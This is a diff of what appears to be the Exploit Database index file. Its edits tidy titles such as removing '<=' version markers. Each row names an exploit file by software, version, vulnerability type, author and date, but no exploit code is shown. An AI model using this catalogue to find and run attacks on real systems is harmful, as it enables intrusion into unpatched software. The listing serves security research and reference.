+16080,7 @@ id,file,description,date,author,platform,type,port 18565,platforms/php/remote/18565.rb,"LotusCMS 3.0 eval() Remote Command Execution",2012-03-07,Metasploit,php,remote,0 18564,platforms/php/webapps/18564.txt,"Drupal CMS 7.12 - Multiple Vulnerabilities",2012-03-02,"Ivano Binetti",php,webapps,0 18552,platforms/windows/dos/18552.pl,"Passport PC To Host Malformed .zws file Memory Corruption",2012-03-03,Silent_Dream,windows,dos,0 -18553,platforms/multiple/webapps/18553.txt,"Rivettracker <= 1.03 - Multiple SQL injection",2012-03-03,"Ali Raheem",multiple,webapps,0 +18553,platforms/multiple/webapps/18553.txt,"Rivettracker 1.03 - Multiple SQL injection",2012-03-03,"Ali Raheem",multiple,webapps,0 18554,platforms/php/webapps/18554.txt,"Timesheet Next Gen 1.5.2 - Multiple SQLi",2012-03-03,G13,php,webapps,0 18555,platforms/windows/remote/18555.txt,"FlashFXP 4.1.8.1701 - Buffer Overflow",2012-03-03,Vulnerability-Lab,windows,remote,0 18556,platforms/php/webapps/18556.txt,"Endian UTM Firewall 2.4.x & 2.5.0 - Multiple Web Vulnerabilities",2012-03-03,Vulnerability-Lab,php,webapps,0 @@ -16090,13 +16090,13 @@ id,file,description,date,author,platform,type,port 18566,platforms/asp/webapps/18566.txt,"Iciniti Store - SQL Injection",2012-03-07,"Sense of Security",asp,webapps,0 18567,platforms/windows/webapps/18567.txt,"HomeSeer HS2 and HomeSeer PRO - Multiple Vulnerabilities",2012-03-07,Silent_Dream,windows,webapps,0 18703,platforms/windows/remote/18703.txt,"Quest Toad for Oracle Explain Plan Display ActiveX Control (QExplain2.dll 6.6.1.1115) Remote File Creation / Overwrite PoC",2012-04-05,rgod,windows,remote,0 -18600,platforms/multiple/dos/18600.txt,"presto! pagemanager <= 9.01 - Multiple Vulnerabilities",2012-03-14,"Luigi Auriemma",multiple,dos,0 -18601,platforms/multiple/dos/18601.txt,"EMC NetWorker <= 7.6 sp3 - Denial of Service",2012-03-14,"Luigi Auriemma",multiple,dos,0 +18600,platforms/multiple/dos/18600.txt,"presto! pagemanager 9.01 - Multiple Vulnerabilities",2012-03-14,"Luigi Auriemma",multiple,dos,0 +18601,platforms/multiple/dos/18601.txt,"EMC NetWorker 7.6 sp3 - Denial of Service",2012-03-14,"Luigi Auriemma",multiple,dos,0 18571,platforms/php/webapps/18571.txt,"promise webpam 2.2.0.13 - Multiple Vulnerabilities",2012-03-07,LiquidWorm,php,webapps,0 18572,platforms/windows/remote/18572.rb,"Adobe Flash Player .mp4 - 'cprt' Overflow",2012-03-08,Metasploit,windows,remote,0 -18575,platforms/php/webapps/18575.txt,"RazorCMS <= 1.2.1 STABLE CSRF (Delete Web Pages)",2012-03-08,"Ivano Binetti",php,webapps,0 +18575,platforms/php/webapps/18575.txt,"RazorCMS 1.2.1 STABLE CSRF (Delete Web Pages)",2012-03-08,"Ivano Binetti",php,webapps,0 18578,platforms/php/webapps/18578.txt,"PHP Address Book 6.2.12 - Multiple security vulnerabilities",2012-03-10,"Stefan Schurtz",php,webapps,0 -18574,platforms/php/webapps/18574.txt,"RazorCMS <= 1.2.1 STABLE File Upload",2012-03-08,"i2sec_Hyo jun Oh",php,webapps,0 +18574,platforms/php/webapps/18574.txt,"RazorCMS 1.2.1 STABLE File Upload",2012-03-08,"i2sec_Hyo jun Oh",php,webapps,0 18579,platforms/linux/dos/18579.txt,"PyPAM - Python bindings for PAM - Double Free Corruption",2012-03-10,"Markus Vervier",linux,dos,0 18582,platforms/cgi/webapps/18582.txt,"Zend Server 5.6.0 - Multiple Remote Script Insertion Vulnerabilities",2012-03-12,LiquidWorm,cgi,webapps,0 18583,platforms/php/webapps/18583.txt,"Saman Portal Local File Inclusion",2012-03-12,TMT,php,webapps,0 @@ -16109,16 +16109,16 @@ id,file,description,date,author,platform,type,port 18619,platforms/multiple/remote/18619.txt,"Apache Tomcat - Remote Exploit (PUT Request) and Account Scanner",2012-03-19,kingcope,multiple,remote,0 18589,platforms/php/webapps/18589.txt,"Acal calendar 2.2.6 - CSRF",2012-03-12,"Number 7",php,webapps,0 18595,platforms/php/webapps/18595.txt,"Max Guestbook 1.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 -18590,platforms/php/webapps/18590.txt,"PBLang Local file include",2012-03-13,"Number 7",php,webapps,0 +18590,platforms/php/webapps/18590.txt,"PBLang - Local File Inclusion",2012-03-13,"Number 7",php,webapps,0 18591,platforms/php/webapps/18591.txt,"Cycade Gallery SQL Injection Exploit",2012-03-13,-DownFall,php,webapps,0 18592,platforms/php/webapps/18592.txt,"4images - Image Gallery Management System - CSRF",2012-03-13,"Dmar al3noOoz",php,webapps,0 18597,platforms/hardware/webapps/18597.txt,"Sitecom WLM-2501 - CSRF Vulnerabilities",2012-03-14,"Ivano Binetti",hardware,webapps,0 18598,platforms/php/webapps/18598.txt,"Encaps PHP Gallery SQL Injection",2012-03-14,"Daniel Godoy",php,webapps,0 -18599,platforms/php/webapps/18599.txt,"asaanCart XSS/LFI Vulnerabilities",2012-03-14,"Number 7",php,webapps,0 -18602,platforms/windows/dos/18602.txt,"Epson EventManager <= 2.50 - Denial of Service",2012-03-14,"Luigi Auriemma",windows,dos,0 -18603,platforms/windows/webapps/18603.txt,"TVersity <= 1.9.7 - Arbitrary File Download",2012-03-14,"Luigi Auriemma",windows,webapps,0 +18599,platforms/php/webapps/18599.txt,"asaanCart - XSS/LFI Vulnerabilities",2012-03-14,"Number 7",php,webapps,0 +18602,platforms/windows/dos/18602.txt,"Epson EventManager 2.50 - Denial of Service",2012-03-14,"Luigi Auriemma",windows,dos,0 +18603,platforms/windows/webapps/18603.txt,"TVersity 1.9.7 - Arbitrary File Download",2012-03-14,"Luigi Auriemma",windows,webapps,0 18604,platforms/windows/remote/18604.rb,"NetDecision 4.5.1 HTTP Server Buffer Overflow",2012-03-15,Metasploit,windows,remote,0 -18605,platforms/windows/webapps/18605.txt,"sockso <= 1.5 - Directory Traversal",2012-03-15,"Luigi Auriemma",windows,webapps,0 +18605,platforms/windows/webapps/18605.txt,"sockso 1.5 - Directory Traversal",2012-03-15,"Luigi Auriemma",windows,webapps,0 18606,platforms/windows/dos/18606.txt,"Microsoft Terminal Services Use After Free (MS12-020)",2012-03-16,"Luigi Auriemma",windows,dos,0 18607,platforms/php/webapps/18607.txt,"OneFileCMS 1.1.5 - Local File Inclusion",2012-03-16,mr.pr0n,php,webapps,0 18608,platforms/php/webapps/18608.txt,"FlexCMS 3.2.1 - Persistent XSS for logged in users",2012-03-16,storm,php,webapps,0 @@ -16136,8 +16136,8 @@ id,file,description,date,author,platform,type,port 18624,platforms/windows/remote/18624.txt,"2X Client for RDP 10.1.1204 ClientSystem Class ActiveX Control Download and Execute",2012-03-19,rgod,windows,remote,0 18625,platforms/windows/remote/18625.txt,"2X ApplicationServer 10.1 TuxSystem Class ActiveX Control Remote File Overwrite",2012-03-19,rgod,windows,remote,0 18626,platforms/jsp/webapps/18626.txt,"ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet Unauthenticated Remote Directory Traversal",2012-03-19,rgod,jsp,webapps,0 -18628,platforms/windows/dos/18628.py,"PeerFTP Server <= 4.01 - Remote Crash PoC",2012-03-20,localh0t,windows,dos,0 -18629,platforms/windows/dos/18629.py,"Tiny Server <= 1.1.9 HTTP HEAD DoS",2012-03-20,"brock haun",windows,dos,0 +18628,platforms/windows/dos/18628.py,"PeerFTP Server 4.01 - Remote Crash PoC",2012-03-20,localh0t,windows,dos,0 +18629,platforms/windows/dos/18629.py,"Tiny Server 1.1.9 HTTP HEAD DoS",2012-03-20,"brock haun",windows,dos,0 18630,platforms/android/dos/18630.txt,"Android FTPServer 1.9.0 - Remote DoS",2012-03-20,G13,android,dos,0 18631,platforms/php/webapps/18631.txt,"OneForum (topic.php) SQL Injection",2012-03-20,"Red Security TEAM",php,webapps,0 18932,platforms/linux/remote/18932.py,"Symantec Web Gateway 5.0.2 - Remote LFI Root Exploit",2012-05-26,muts,linux,remote,0 @@ -16146,7 +16146,7 @@ id,file,description,date,author,platform,type,port 18636,platforms/windows/dos/18636.txt,"Oreans Themida 2.1.8.0 - TMD File Handling Buffer Overflow",2012-03-21,LiquidWorm,windows,dos,0 18637,platforms/windows/dos/18637.txt,"Oreans WinLicense 2.1.8.0 - XML File Handling Unspecified Memory Corruption",2012-03-21,LiquidWorm,windows,dos,0 18638,platforms/hardware/webapps/18638.txt,"D-Link DIR-605 - CSRF",2012-03-21,iqzer0,hardware,webapps,0 -18639,platforms/php/webapps/18639.txt,"phpList 2.10.17 - Remote SQL Injection and XSS",2012-03-21,LiquidWorm,php,webapps,0 +18639,platforms/php/webapps/18639.txt,"phpList 2.10.17 - SQL Injection and XSS",2012-03-21,LiquidWorm,php,webapps,0 18640,platforms/windows/remote/18640.txt,"Google Talk gtalk:// Deprecated Uri Handler Parameter Injection",2012-03-22,rgod,windows,remote,0 18641,platforms/windows/dos/18641.txt,"Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT ActiveX Control PlayerPT.ocx sprintf Buffer Overflow",2012-03-22,rgod,windows,dos,0 18642,platforms/windows/remote/18642.rb,"Microsoft Internet Explorer - Object Memory Use-After-Free (MS10-002)",2012-03-22,Metasploit,windows,remote,0 @@ -16158,21 +16158,21 @@ id,file,description,date,author,platform,type,port 18649,platforms/php/webapps/18649.txt,"FreePBX 2.10.0 / 2.9.0 - Multiple Vulnerabilities",2012-03-22,"Martin Tschirsich",php,webapps,0 18650,platforms/php/webapps/18650.py,"FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution Exploit",2012-03-23,muts,php,webapps,0 18651,platforms/asp/webapps/18651.txt,"Sitecom WLM-2501 new Multiple CSRF Vulnerabilities",2012-03-23,"Ivano Binetti",asp,webapps,0 -18652,platforms/php/webapps/18652.txt,"Wolfcms <= 0.75 - (CSRF/XSS) Multiple Vulnerabilities",2012-03-23,"Ivano Binetti",php,webapps,0 +18652,platforms/php/webapps/18652.txt,"Wolfcms 0.75 - (CSRF/XSS) Multiple Vulnerabilities",2012-03-23,"Ivano Binetti",php,webapps,0 18654,platforms/windows/dos/18654.txt,"Spotify 0.8.2.610 - (search func) Memory Exhaustion Exploit",2012-03-23,LiquidWorm,windows,dos,0 -18655,platforms/php/webapps/18655.php,"phpFox <= 3.0.1 - (ajax.php) Remote Command Execution Exploit",2012-03-23,EgiX,php,webapps,0 +18655,platforms/php/webapps/18655.php,"phpFox 3.0.1 - (ajax.php) Remote Command Execution Exploit",2012-03-23,EgiX,php,webapps,0 18656,platforms/windows/local/18656.pl,"mmPlayer 2.2 - (.m3u) Local Buffer Overflow Exploit (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0 18657,platforms/windows/local/18657.pl,"mmPlayer 2.2 - (.ppl) Local Buffer Overflow Exploit (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0 -18695,platforms/windows/remote/18695.py,"Sysax <= 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0 +18695,platforms/windows/remote/18695.py,"Sysax 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0 18658,platforms/windows/remote/18658.rb,"Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow'",2012-03-24,Metasploit,windows,remote,0 18659,platforms/php/webapps/18659.rb,"FreePBX 2.10.0 / 2.9.0 - callmenum Remote Code Execution",2012-03-24,Metasploit,php,webapps,0 -18660,platforms/php/webapps/18660.txt,"RIPS <= 0.53 - Multiple Local File Inclusion Vulnerabilities",2012-03-24,localh0t,php,webapps,0 +18660,platforms/php/webapps/18660.txt,"RIPS 0.53 - Multiple Local File Inclusion Vulnerabilities",2012-03-24,localh0t,php,webapps,0 18661,platforms/windows/dos/18661.txt,"RealPlayer .mp4 file handling memory corruption",2012-03-24,"Senator of Pirates",windows,dos,0 -18676,platforms/php/webapps/18676.txt,"boastMachine <= 3.1 - CSRF Add Admin",2012-03-28,Dr.NaNo,php,webapps,0 -18670,platforms/php/webapps/18670.txt,"PicoPublisher 2.0 - Remote SQL Injection",2012-03-28,ZeTH,php,webapps,0 +18676,platforms/php/webapps/18676.txt,"boastMachine 3.1 - CSRF Add Admin",2012-03-28,Dr.NaNo,php,webapps,0 +18670,platforms/php/webapps/18670.txt,"PicoPublisher 2.0 - SQL Injection",2012-03-28,ZeTH,php,webapps,0 18666,platforms/windows/remote/18666.rb,"UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow",2012-03-26,Metasploit,windows,remote,0 18665,platforms/multiple/dos/18665.py,"PHP 5.4.0 Built-in Web Server - DoS PoC",2012-03-25,ls,multiple,dos,0 -18667,platforms/php/webapps/18667.html,"Family CMS <= 2.9 - Multiple Vulnerabilities",2012-03-26,"Ahmed Elhady Mohamed",php,webapps,0 +18667,platforms/php/webapps/18667.html,"Family CMS 2.9 - Multiple Vulnerabilities",2012-03-26,"Ahmed Elhady Mohamed",php,webapps,0 18668,platforms/php/webapps/18668.txt,"vBshop Multiple Persistent XSS Vulnerabilities",2012-03-26,ToiL,php,webapps,0 18671,platforms/windows/dos/18671.pl,"KnFTPd 1.0.0 - 'FEAT' DoS PoC-Exploit",2012-03-28,"Stefan Schurtz",windows,dos,0 18672,platforms/windows/remote/18672.txt,"Quest InTrust 10.4.x ReportTree and SimpleTree Classes",2012-03-28,rgod,windows,remote,0 @@ -16184,26 +16184,26 @@ id,file,description,date,author,platform,type,port 18680,platforms/php/webapps/18680.txt,"coppermine 1.5.18 - Multiple Vulnerabilities",2012-03-30,waraxe,php,webapps,0 18681,platforms/windows/local/18681.txt,"Bitsmith PS Knowbase 3.2.3 - Buffer Overflow",2012-03-30,Vulnerability-Lab,windows,local,0 18682,platforms/php/webapps/18682.txt,"ArticleSetup Multiple Persistence Cross-Site Scripting and SQL Injection Vulnerabilities",2012-03-30,"SecPod Research",php,webapps,0 -18683,platforms/windows/remote/18683.py,"MailMax <= 4.6 - POP3 - 'USER' Remote Buffer Overflow Exploit (No Login Needed)",2012-03-30,localh0t,windows,remote,0 -18685,platforms/php/webapps/18685.txt,"dalbum <= 144 build 174 - CSRF Vulnerabilities",2012-03-30,"Ahmed Elhady Mohamed",php,webapps,0 -18686,platforms/php/webapps/18686.txt,"SyndeoCMS <= 3.0.01 Persistent XSS",2012-03-30,"Ivano Binetti",php,webapps,0 +18683,platforms/windows/remote/18683.py,"MailMax 4.6 - POP3 - 'USER' Remote Buffer Overflow Exploit (No Login Needed)",2012-03-30,localh0t,windows,remote,0 +18685,platforms/php/webapps/18685.txt,"dalbum 144 build 174 - CSRF Vulnerabilities",2012-03-30,"Ahmed Elhady Mohamed",php,webapps,0 +18686,platforms/php/webapps/18686.txt,"SyndeoCMS 3.0.01 Persistent XSS",2012-03-30,"Ivano Binetti",php,webapps,0 18687,platforms/php/webapps/18687.txt,"Landshop 0.9.2 - Multiple Web Vulnerabilities",2012-03-31,Vulnerability-Lab,php,webapps,0 18688,platforms/hardware/dos/18688.txt,"EMC Data Protection Advisor 5.8.1 - Denial of Service",2012-03-31,"Luigi Auriemma",hardware,dos,0 -18689,platforms/php/webapps/18689.txt,"Woltlab Burning Board 2.2 / 2.3 - [WN]KT KickTipp 3.1 - Remote SQL Injection",2012-03-31,"Easy Laster",php,webapps,0 -18690,platforms/php/webapps/18690.txt,"Buddypress plugin of WordPress - Remote SQL Injection",2012-03-31,"Ivan Terkin",php,webapps,0 +18689,platforms/php/webapps/18689.txt,"Woltlab Burning Board 2.2 / 2.3 - [WN]KT KickTipp 3.1 - SQL Injection",2012-03-31,"Easy Laster",php,webapps,0 +18690,platforms/php/webapps/18690.txt,"Buddypress plugin of WordPress - SQL Injection",2012-03-31,"Ivan Terkin",php,webapps,0 18691,platforms/windows/dos/18691.rb,"FoxPlayer 2.6.0 - Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",windows,dos,0 18692,platforms/linux/dos/18692.rb,"SnackAmp 3.1.3 - (.aiff) Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",linux,dos,0 18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - SEH&DEP&ASLR",2012-04-03,b33f,windows,local,0 -18694,platforms/php/webapps/18694.txt,"Simple PHP Agenda <= 2.2.8 - CSRF (Add Admin & Add Event)",2012-04-03,"Ivano Binetti",php,webapps,0 +18694,platforms/php/webapps/18694.txt,"Simple PHP Agenda 2.2.8 - CSRF (Add Admin & Add Event)",2012-04-03,"Ivano Binetti",php,webapps,0 18708,platforms/php/webapps/18708.txt,"GENU CMS SQL Injection",2012-04-05,"hordcode security",php,webapps,0 18709,platforms/windows/remote/18709.rb,"TRENDnet SecurView Internet Camera UltraMJCam OpenFileDlg Buffer Overflow",2012-04-06,Metasploit,windows,remote,0 18710,platforms/windows/local/18710.rb,"Csound hetro File Handling Stack Buffer Overflow",2012-04-06,Metasploit,windows,local,0 18711,platforms/php/webapps/18711.txt,"w-cms 2.0.1 - Multiple Vulnerabilities",2012-04-06,Black-ID,php,webapps,0 18714,platforms/windows/remote/18714.rb,"LANDesk Lenovo ThinkManagement Console Remote Command Execution",2012-04-08,Metasploit,windows,remote,0 18715,platforms/multiple/webapps/18715.rb,"Liferay XSL - Command Execution (Metasploit)",2012-04-08,"Spencer McIntyre",multiple,webapps,0 -18718,platforms/windows/remote/18718.txt,"distinct tftp server <= 3.01 - Directory Traversal",2012-04-08,modpr0be,windows,remote,0 +18718,platforms/windows/remote/18718.txt,"distinct tftp server 3.01 - Directory Traversal",2012-04-08,modpr0be,windows,remote,0 18719,platforms/windows/dos/18719.pl,"Play [EX] 2.1 - Playlist File (M3U/PLS/LST) DoS Exploit",2012-04-08,Death-Shadow-Dark,windows,dos,0 -18720,platforms/php/webapps/18720.txt,"Utopia News Pro <= 1.4.0 - CSRF Add Admin",2012-04-08,Dr.NaNo,php,webapps,0 +18720,platforms/php/webapps/18720.txt,"Utopia News Pro 1.4.0 - CSRF Add Admin",2012-04-08,Dr.NaNo,php,webapps,0 18771,platforms/windows/dos/18771.txt,"SumatraPDF 2.0.1 - (.chm) & (.mobi) Memory Corruption",2012-04-23,shinnai,windows,dos,0 18722,platforms/cgi/webapps/18722.txt,"ZTE Change admin password",2012-04-08,"Nuevo Asesino",cgi,webapps,0 18723,platforms/multiple/remote/18723.rb,"Snort 2 DCE/RPC preprocessor Buffer Overflow",2012-04-09,Metasploit,multiple,remote,0 @@ -16226,7 +16226,7 @@ id,file,description,date,author,platform,type,port 18741,platforms/php/webapps/18741.txt,"joomla component (com_ponygallery) SQL Injection",2012-04-15,xDarkSton3x,php,webapps,0 18742,platforms/php/webapps/18742.php,"NetworX CMS - CSRF Add Admin",2012-04-15,N3t.Crack3r,php,webapps,0 18743,platforms/php/webapps/18743.txt,"MediaXxx Adult Video / Media Script SQL Injection",2012-04-15,"Daniel Godoy",php,webapps,0 -18745,platforms/multiple/webapps/18745.txt,"ManageEngine Support Center Plus <= 7903 - Multiple Vulnerabilities",2012-04-15,xistence,multiple,webapps,0 +18745,platforms/multiple/webapps/18745.txt,"ManageEngine Support Center Plus 7903 - Multiple Vulnerabilities",2012-04-15,xistence,multiple,webapps,0 18747,platforms/windows/local/18747.rb,"CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit",2012-04-18,Metasploit,windows,local,0 18748,platforms/windows/local/18748.rb,"GSM SIM Editor 5.15 - Buffer Overflow",2012-04-18,Metasploit,windows,local,0 18750,platforms/multiple/webapps/18750.txt,"Scrutinizer NetFlow & sFlow Analyzer - Multiple Vulnerabilities",2012-04-19,"Trustwave's SpiderLabs",multiple,webapps,0 @@ -16244,14 +16244,14 @@ id,file,description,date,author,platform,type,port 18772,platforms/php/webapps/18772.txt,"Havalite CMS 1.0.4 - Multiple Vulnerabilities",2012-04-23,Vulnerability-Lab,php,webapps,0 18763,platforms/multiple/remote/18763.txt,"Liferay 6.0.x WebDAV - File Reading",2012-04-22,"Jelmer Kuperus",multiple,remote,0 18764,platforms/windows/webapps/18764.txt,"Oracle GlassFish Server 3.1.1 - (build 12) Multiple XSS",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0 -18765,platforms/windows/dos/18765.txt,"samsung net-i ware <= 1.37 - Multiple Vulnerabilities",2012-04-22,"Luigi Auriemma",windows,dos,0 +18765,platforms/windows/dos/18765.txt,"samsung net-i ware 1.37 - Multiple Vulnerabilities",2012-04-22,"Luigi Auriemma",windows,dos,0 18766,platforms/windows/webapps/18766.txt,"Oracle GlassFish Server - REST CSRF",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0 18768,platforms/php/webapps/18768.txt,"Mega File Manager - File Download",2012-04-22,"i2sec-Min Gi Jo",php,webapps,0 18780,platforms/windows/remote/18780.rb,"WIndows - MSCOMCTL ActiveX Buffer Overflow (MS12-027)",2012-04-25,Metasploit,windows,remote,0 18770,platforms/php/webapps/18770.txt,"vtiger CRM 5.1.0 - Local File Inclusion",2012-04-22,Pi3rrot,php,webapps,0 18773,platforms/php/webapps/18773.txt,"exponentcms 2.0.5 - Multiple Vulnerabilities",2012-04-23,"Onur Yılmaz",php,webapps,0 18774,platforms/windows/dos/18774.txt,"Mobipocket Reader 6.2 Build 608 - Buffer Overflow",2012-04-23,shinnai,windows,dos,0 -18775,platforms/php/webapps/18775.php,"WebCalendar <= 1.2.4 - (install/index.php) Remote Code Execution",2012-04-23,EgiX,php,webapps,0 +18775,platforms/php/webapps/18775.php,"WebCalendar 1.2.4 - (install/index.php) Remote Code Execution",2012-04-23,EgiX,php,webapps,0 18776,platforms/windows/dos/18776.txt,"BeyondCHM 1.1 - Buffer Overflow",2012-04-24,shinnai,windows,dos,0 18777,platforms/windows/dos/18777.txt,".NET Framework EncoderParameter - Integer Overflow",2012-04-24,"Akita Software Security",windows,dos,0 18778,platforms/php/webapps/18778.txt,"PHP Ticket System Beta 1 - (index.php p parameter) SQL Injection",2012-04-24,G13,php,webapps,0 @@ -16261,13 +16261,13 @@ id,file,description,date,author,platform,type,port 18783,platforms/linux/local/18783.txt,"mount.cifs chdir() Arbitrary Root File Identification",2012-04-25,Sha0,linux,local,0 18788,platforms/php/webapps/18788.txt,"php volunteer management 1.0.2 - Multiple Vulnerabilities",2012-04-26,G13,php,webapps,0 18785,platforms/linux/local/18785.txt,"Parallels PLESK 9.x - Insecure Permissions",2012-04-26,"Nicolas Krassas",linux,local,0 -18787,platforms/php/webapps/18787.txt,"WordPress Zingiri Web Shop Plugin <= 2.4.0 - Multiple XSS Vulnerabilities",2012-04-26,"Mehmet Ince",php,webapps,0 +18787,platforms/php/webapps/18787.txt,"WordPress Zingiri Web Shop Plugin 2.4.0 - Multiple XSS Vulnerabilities",2012-04-26,"Mehmet Ince",php,webapps,0 18797,platforms/linux/webapps/18797.rb,"WebCalendar 1.2.4 - Pre-Auth Remote Code Injection",2012-04-29,Metasploit,linux,webapps,0 -18798,platforms/php/webapps/18798.txt,"Soco CMS Local File Include",2012-04-29,"BHG Security Center",php,webapps,0 +18798,platforms/php/webapps/18798.txt,"Soco CMS Local File Inclusion",2012-04-29,"BHG Security Center",php,webapps,0 18799,platforms/windows/dos/18799.py,"Remote-Anything Player 5.60.15 - Denial of Service",2012-04-29,"Saint Patrick",windows,dos,0 18791,platforms/php/webapps/18791.txt,"WordPress 3.3.1 - Multiple CSRF Vulnerabilities",2012-04-27,"Ivano Binetti",php,webapps,0 -18792,platforms/windows/local/18792.rb,"CPE17 Autorun Killer <= 1.7.1 - Stack Buffer Overflow Exploit (Metasploit)",2012-04-27,"Xenithz xpt",windows,local,0 -18793,platforms/php/webapps/18793.txt,"Axous 1.1.0 - SQL Injection Vulnerabilitiy",2012-04-27,"H4ckCity Secuirty TeaM",php,webapps,0 +18792,platforms/windows/local/18792.rb,"CPE17 Autorun Killer 1.7.1 - Stack Buffer Overflow Exploit (Metasploit)",2012-04-27,"Xenithz xpt",windows,local,0 +18793,platforms/php/webapps/18793.txt,"Axous 1.1.0 - SQL Injection",2012-04-27,"H4ckCity Secuirty TeaM",php,webapps,0 18833,platforms/windows/remote/18833.rb,"Solarwinds Storage Manager 5.1.0 - SQL Injection",2012-05-04,Metasploit,windows,remote,0 18795,platforms/windows/dos/18795.py,"Nokia PC Suite Video Manager 7.1.180.64 - (.mp4) Denial of Service",2012-04-27,"Senator of Pirates",windows,dos,0 18800,platforms/php/webapps/18800.txt,"Alienvault OSSIM Open Source SIEM 3.1 - Multiple Security Vulnerabilities",2012-04-29,"Stefan Schurtz",php,webapps,0 @@ -16276,18 +16276,18 @@ id,file,description,date,author,platform,type,port 18803,platforms/php/webapps/18803.txt,"Opial CMS 2.0 - Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,php,webapps,0 18804,platforms/php/webapps/18804.txt,"DIY CMS 1.0 Poll - Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,php,webapps,0 18805,platforms/windows/remote/18805.txt,"McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX GetObject() Exploit",2012-04-30,rgod,windows,remote,0 -18806,platforms/php/webapps/18806.txt,"WordPress Zingiri Web Shop Plugin <= 2.4.2 - Persistent XSS",2012-05-01,"Mehmet Ince",php,webapps,0 +18806,platforms/php/webapps/18806.txt,"WordPress Zingiri Web Shop Plugin 2.4.2 - Persistent XSS",2012-05-01,"Mehmet Ince",php,webapps,0 18814,platforms/php/webapps/18814.txt,"MyClientBase 0.12 - Multiple Vulnerabilities",2012-05-01,Vulnerability-Lab,php,webapps,0 18808,platforms/windows/local/18808.html,"SAMSUNG NET-i Viewer 1.37 SEH Overwrite",2012-05-01,blake,windows,local,0 18809,platforms/php/webapps/18809.txt,"GENU CMS 2012.3 - Multiple SQL Injection Vulnerabilities",2012-05-01,Vulnerability-Lab,php,webapps,0 18812,platforms/windows/remote/18812.rb,"McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject",2012-05-01,Metasploit,windows,remote,0 18813,platforms/php/webapps/18813.txt,"opencart 1.5.2.1 - Multiple Vulnerabilities",2012-05-01,waraxe,php,webapps,0 18815,platforms/php/webapps/18815.txt,"STRATO Newsletter Manager Directory Traversal",2012-05-01,"Zero X",php,webapps,0 -18816,platforms/windows/dos/18816.py,"LAN Messenger <= 1.2.28 - Denial of Service",2012-05-01,"Julien Ahrens",windows,dos,0 +18816,platforms/windows/dos/18816.py,"LAN Messenger 1.2.28 - Denial of Service",2012-05-01,"Julien Ahrens",windows,dos,0 18817,platforms/hardware/dos/18817.py,"Mikrotik Router Denial of Service",2012-05-01,PoURaN,hardware,dos,0 18818,platforms/windows/remote/18818.py,"Solarwinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection Exploit",2012-05-01,muts,windows,remote,0 18819,platforms/windows/dos/18819.cpp,"Microsoft Windows XP - Win32k.sys Local Kernel DoS",2012-05-02,"Lufeng Li",windows,dos,0 -18820,platforms/php/webapps/18820.php,"OpenConf <= 4.11 - (author/edit.php) Remote Blind SQL Injection Exploit",2012-05-02,EgiX,php,webapps,0 +18820,platforms/php/webapps/18820.php,"OpenConf 4.11 - (author/edit.php) Remote Blind SQL Injection Exploit",2012-05-02,EgiX,php,webapps,0 18823,platforms/windows/local/18823.txt,"Symantec pcAnywhere - Insecure File Permissions Local Privilege Escalation",2012-05-02,"Edward Torkington",windows,local,0 18824,platforms/cgi/webapps/18824.txt,"Websense Triton - Multiple Vulnerabilities",2012-05-02,"Ben Williams",cgi,webapps,0 18822,platforms/php/webapps/18822.txt,"php-decoda - Cross-Site Scripting In Video Tag",2012-05-02,"RedTeam Pentesting",php,webapps,0 @@ -16321,7 +16321,7 @@ id,file,description,date,author,platform,type,port 18858,platforms/php/webapps/18858.txt,"elearning server 4g - Multiple Vulnerabilities",2012-05-10,"Andrey Komarov",php,webapps,0 18866,platforms/windows/remote/18866.rb,"Distinct TFTP 3.01 - Writable Directory Traversal Execution",2012-05-12,Metasploit,windows,remote,0 18869,platforms/windows/local/18869.pl,"AnvSoft Any Video Converter 4.3.6 Unicode Buffer Overflow",2012-05-12,h1ch4m,windows,local,0 -18868,platforms/php/webapps/18868.txt,"Sockso <= 1.51 - Persistent XSS",2012-05-12,"Ciaran McNally",php,webapps,0 +18868,platforms/php/webapps/18868.txt,"Sockso 1.51 - Persistent XSS",2012-05-12,"Ciaran McNally",php,webapps,0 18870,platforms/windows/remote/18870.rb,"Firefox 8/9 AttributeChildRemoved() Use-After-Free",2012-05-13,Metasploit,windows,remote,0 18872,platforms/php/webapps/18872.txt,"Proman Xpress 5.0.1 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 18873,platforms/php/webapps/18873.txt,"Viscacha Forum CMS 0.8.1.1 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 @@ -16333,12 +16333,12 @@ id,file,description,date,author,platform,type,port 18878,platforms/windows/dos/18878.txt,"Pro-face Pro-Server EX WinGP PC Runtime - Multiple Vulnerabilities",2012-05-14,"Luigi Auriemma",windows,dos,0 18881,platforms/java/webapps/18881.txt,"Liferay Portal 6.1 - 6.0.x Privilege Escalation",2012-05-13,"Jelmer Kuperus",java,webapps,0 18882,platforms/php/webapps/18882.txt,"b2ePms 1.0 - Authentication Bypass",2012-05-15,"Jean Pascal Pereira",php,webapps,0 -18884,platforms/php/webapps/18884.txt,"Serendipity 1.6 Backend XSS And SQLi",2012-05-08,"Stefan Schurtz",php,webapps,0 +18884,platforms/php/webapps/18884.txt,"Serendipity 1.6 - Backend XSS And SQLi",2012-05-08,"Stefan Schurtz",php,webapps,0 18886,platforms/php/webapps/18886.txt,"Axous 1.1.1 - (CSRF/Persistent XSS) Multiple Vulnerabilities",2012-05-16,"Ivano Binetti",php,webapps,0 